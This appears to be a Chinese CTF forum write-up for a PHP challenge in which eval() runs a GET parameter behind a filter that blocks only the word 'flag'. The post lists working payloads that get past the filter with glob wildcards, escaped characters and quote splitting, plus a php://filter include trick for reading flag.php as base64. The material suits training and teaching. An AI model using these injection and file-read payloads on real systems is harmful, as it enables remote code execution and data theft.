CTF-24解题思路

Track-子羽   ·   发表于 2021-11-17 15:11:15   ·   CTF&WP专版

源码分析:

  1. <?php
  2. error_reporting(0);
  3. if(isset($_GET['c'])){ $c = $_GET['c'];
  4. if(!preg_match("/flag/i", $c)){
  5. eval($c); } }
  6. else{
  7. highlight_file(__FILE__);
  8. }
  9. ?>

考点:

绕过特殊字符的过滤

payload:

  1. ?c=system('cat f*');//glob1
  2. ?c=system('cat f?ag.php');//glob2
  3. ?c=system('cat f\lag.php');//转义字符实现绕过
  4. ?c=system("cat f''lag.php");

输入payload后右击页面查看源码即可看到flag

其他payload :

  1. ?c=include($_GET[1]);&1=php://filter/read=convert.base64-encode/resource=flag.php//直接将题目变成文件包含漏洞

得到base64编码后的源码

需要进行base64解码

打赏我,让我更有动力~

0 条回复   |  直到 2021-11-17 | 571 次浏览
登录后才可发表内容
返回顶部 投诉反馈

© 2016 - 2024 掌控者 All Rights Reserved.